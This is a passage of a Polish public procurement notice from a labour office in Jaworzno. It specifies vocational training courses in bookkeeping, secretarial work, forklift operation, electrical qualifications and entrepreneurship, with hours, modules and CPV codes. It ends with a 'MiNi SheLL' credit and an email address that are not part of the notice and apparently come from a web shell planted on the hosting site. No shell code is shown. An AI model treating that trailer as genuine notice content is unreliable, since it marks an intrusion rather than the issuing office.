1) Łączenie rur gazowych z polietylenu
2) Układanie rurociągów gazowych z polietylenu
Dodatkowe wymagania: Wykonawca zapewni dla każdego uczestnika szkolenia odzież ochronną oraz materiały i sprzęt niezbędne do odbycia wszystkich zajęć praktycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 48.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> IV.  Zakres: Księgowość - 5 osób w I edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 9 tygodni. 
Program szkolenia: minimalna ilość godzin - 270, w tym minimum 220 godzin ćwiczeń.
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: księgowy (samodzielny), z zakresu:  księgowy bilansista (kod zawodu: 343201) z następującymi jednostkami modułowymi: 
1) ogólne zasady rachunkowości,
2) środki gospodarcze i źródła ich pochodzenia,
3) ewidencja operacji gospodarczych,
4) organizacja rachunkowości w jednostkach gospodarczych,
5) ogólne zasady inwentaryzacji,
6) ewidencja obrotu gotówkowego,
7) ewidencja obrotu bezgotówkowego,
8) ewidencja innych środków pieniężnych,
9) sporządzanie list płac i rozdzielników,
10)   sporządzanie list zasiłków i deklaracji ZUS
11)   rozliczanie podatku dochodowego od osób fizycznych,
12)   ewidencja rozrachunków z tytułu VAT,
13)   ewidencja rozrachunków z dostawcami,
14)   ewidencja rozrachunków z odbiorcami,
15)   ewidencja rozrachunków z pracownikami,
16)   ewidencja rozrachunków publiczno - prawnych,
17)   ewidencja pozostałych rozrachunków,
18)   ewidencja roszczeń,
19)   ewidencja roszczeń barterowych,
20)   ewidencja inwestycji,
21)   ewidencja środków trwałych,
22)   ewidencja finansowego majątku trwałego,
23)   ewidencja wartości niematerialnych i prawnych,
24)   ewidencja leasingu,
25)   ewidencja i rozliczanie zakupu towarów i opakowań,
26)   ewidencja zakupu usług,
27)   ewidencja i rozliczanie zakupu materiałów,
28)   ewidencja zużycia materiałów,
29)   rozliczenie kosztów handlowych,
30)   ewidencja i rozliczenie kosztów przedsiębiorstwa,
31)   kalkulacja kosztu jednostkowego produktu,
32)   ewidencja wyrobów gotowych,
33)   ewidencja sprzedaży towarów,
34)   ewidencja sprzedaży usług,
35)   ewidencja sprzedaży wyrobów gotowych,
36)   ustalenie wyniku finansowego,
37)   ewidencja wyniku finansowego,
38)   podział wyniku finansowego,
39)   ewidencja funduszy i kapitałów własnych,
40)   ewidencja funduszy specjalnych,
41)   sporządzanie sprawozdań,
42)   sporządzanie bilansu,
43)   sporządzanie sprawozdań z przepływu środków pieniężnych,
44)   sporządzanie rachunku zysków i strat,
45)   analiza podstawowych wskaźników finansowych,
46)   obsługa komputera w zakresie podstawowym,
47)   arkusze kalkulacyjne w zastosowaniach  finansowo- księgowych,
48)   obsługa programów płacowych,
49)   obsługa programów finansowo- księgowych
-- suma godzin dla jednostek modułowych 46,47,48,49 - minimum 40 godzin
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
2. jednostkę modułową: obsługa programu SYMFONIA w zakresie księgowości - minimum 40 godzin, 
3. jednostkę modułową: fakturowanie komputerowe - minimum 15 godzin. 
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 54.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> V.  Zakres: Sekretarka -5 osób w I edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 8 tygodni, 
Program szkolenia: minimalna ilość godzin - 250, w tym minimum 150 godzin ćwiczeń oraz 50 godzin praktyki na stanowisku pracy w zakładzie pracy. 
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: sekretarka, z zakresu:  asystentka szefa (kod zawodu: 411101) z następującymi jednostkami modułowymi: 
1) Wykazywanie kultury osobistej, 
2) Utrzymywanie wyglądu i prezencji osobistej, 
3) Organizacja i utrzymywanie estetyki sekretariatu i gabinetu szefa, 
4) Organizacja pracy biurowej, 
5) Organizacja biura pod względem bhp i ppoż., 
6) Sporządzanie korespondencji w sprawach handlowych, osobowych i administracyjnych, 
7) Obsługa środków łączności, 
8) Obsługa biurowych środków technicznych, 
9) Obsługa interesantów, 
10) Organizacja podróży i spotkań, 
11) Obsługa komputera w zakresie podstawowym, 
12) Korzystanie z komputerowych programów gromadzenia i przetwarzania danych, 
13) Edycja komputerowa dokumentów, 
14) Komunikacja komputerowa
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie 
z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
2. jednostka modułowa: bezwzrokowe pisanie na klawiaturze - minimum 30 godzin 
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 48.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> VI. Zakres: Operator - kierowca wózka jezdniowego wraz wymianą butli gazowych oraz egzaminem UDT - 
10 osób w I edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 2 tygodnie. 
Program szkolenia: minimalna ilość godzin - 67, w tym minimum 21 godzin ćwiczeń. Szkolenie ma przygotować uczestników do samodzielnego prowadzenia i obsługi wózka w transporcie wewnątrzzakładowym oraz powinno być przeprowadzone w oparciu o program opracowany lub zatwierdzony przez jednostkę organizacyjną wyznaczoną przez Ministra właściwego do spraw gospodarki zgodnie z Rozporządzeniem Ministra Gospodarki 
z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych 
z napędem silnikowym (Dz. U. Nr 70, poz. 650 z późn. zm) lub równoważny.
Dodatkowe wymagania: W ramach szkolenia Wykonawca zorganizuje i przeprowadzi egzamin przed Komisją Urzędu Dozoru Technicznego. Egzamin zostanie zorganizowany najpóźniej w ostatnim dniu szkolenia. 
Każdy uczestnik szkolenia powinien otrzymać zaświadczenie zgodnie z Rozdziałem 3 pkt 3.5 SIWZ oraz zaświadczenie kwalifikacyjne wydane przez Urząd Dozoru Technicznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 12.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> VII. Zakres: Uprawnienia SEP do 1 kV -5 osób w I edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 2 tygodnie.
Program szkolenia: minimalna ilość godzin- 60. Program szkolenia musi być zgodny z przepisami rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. Nr 89, poz. 828 z późn. zm.) i obwieszczenia Prezesa Rady Ministrów z dnia 02 lipca 2003r. o sprostowaniu błędów (Dz. U. Nr 129, poz. 1184) oraz rozporządzenia Ministra Gospodarki i Pracy z dnia 20 lipca 2005r. zmieniającego rozporządzenie w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń instalacji i sieci ( Dz. U. Nr 141, poz. 1189) oraz zawierać m.in.:
1. zasady budowy, działania oraz warunków technicznych obsługi urządzeń, instalacji i sieci,
2. zasady eksploatacji oraz instrukcji eksploatacji urządzeń, instalacji i sieci,
3. zasady i warunki wykonywania prac kontrolno - pomiarowych i montażowych,
4. zasady i wymagania bezpieczeństwa pracy i ochrony przeciwpożarowej oraz umiejętności udzielania pierwszej pomocy,
5. instrukcję postępowania w razie awarii, pożaru lub innego zagrożenia bezpieczeństwa obsługi urządzeń lub zagrożenia życia, zdrowia i środowiska.
Dodatkowe wymagania: Szkolenie powinno zakończyć się egzaminem zewnętrznym przed Komisją powołaną przez Urząd Regulacji Energetyki. Każdy uczestnik szkolenia powinien otrzymać zaświadczenie zgodnie 
z Rozdziałem 3 pkt 3.5 SIWZ oraz świadectwo kwalifikacyjne w grupie materiałowej G-1E zgodnie z wzorem świadectwa kwalifikacyjnego, stanowiącym załącznik do rozporządzenia Ministra Gospodarki i Pracy z dnia 20 lipca 2005r. zmieniającego rozporządzenie w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń instalacji i sieci (Dz. U. Nr 141 poz. 1189). Egzamin zostanie zorganizowany najpóźniej w ostatnim dniu szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 12.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> VIII.  Zakres: Podstawy przedsiębiorczości - 15 osób w I edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 2 tygodnie. 
Program szkolenia: minimalna ilość godzin - 65, w tym minimum 33 godzin ćwiczeń.
Program szkolenia musi zawierać następujące jednostki modułowe:
1. aspekty prawne działalności gospodarczej - minimum 5 godzin teorii,
2. zagadnienia prawne z kodeksu pracy - minimum 5 godzin teorii,
3. podatki- minimum 5 godzin teorii oraz minimum 5 godzin ćwiczeń,
4. zasady ubezpieczenia w ZUS-ie - minimum 5 godzin teorii oraz minimum 5 godzin ćwiczeń,
5. czynności związane z rozpoczynaniem działalności gospodarczej - minimum 5 godzin teorii oraz minimum               5 godziny ćwiczeń,
6. obsługa komputera - minimum 3 godziny teorii oraz minimum 12 godzin ćwiczeń,
7. biznes plan - minimum 2 godziny teorii oraz minimum 3 godzin ćwiczeń
8. omówienie i wypełnianie Wniosku o dofinansowanie podhjęcia działalnosci gospodarczej, w tym kosztów pomocy prawnej, konsultacji i doradztwa zwiazanych z podjeciem tej działalności stosowanego w Powiatowym Urzedzie Pracy w Jaworznie - minimum 2 godziny teorii oraz minimum 3 godziny ćwiczeń. 
UWAGA! Podane ilości godzin szkolenia oznaczają godziny zegarowe! Godzina zegarowa kursu liczy 60      minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę, liczącą średnio 15 minut. Długość przerw może być ustalana w sposób elastyczny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 12.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com